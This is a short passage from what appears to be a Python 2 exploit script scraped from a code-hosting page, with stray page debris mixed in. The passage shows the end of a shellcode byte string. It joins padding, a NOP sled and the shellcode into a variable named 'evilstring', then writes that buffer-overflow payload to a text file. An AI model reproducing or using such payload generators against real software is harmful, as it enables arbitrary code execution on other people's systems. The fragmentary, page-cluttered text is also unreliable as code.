|
||||
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
|
||||
"\x53\x53\x53\x53\x52\x53\xff\xd7")
|
||||
|
||||
evilstring = a+b+nop+shellcode+c
|
||||
|
||||
|
||||
file = open ('evilstring.txt', "w")
|
||||
file.write(evilstring)
|
||||
file.close
|
||||
|
||||
print evilstring
|
||||
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue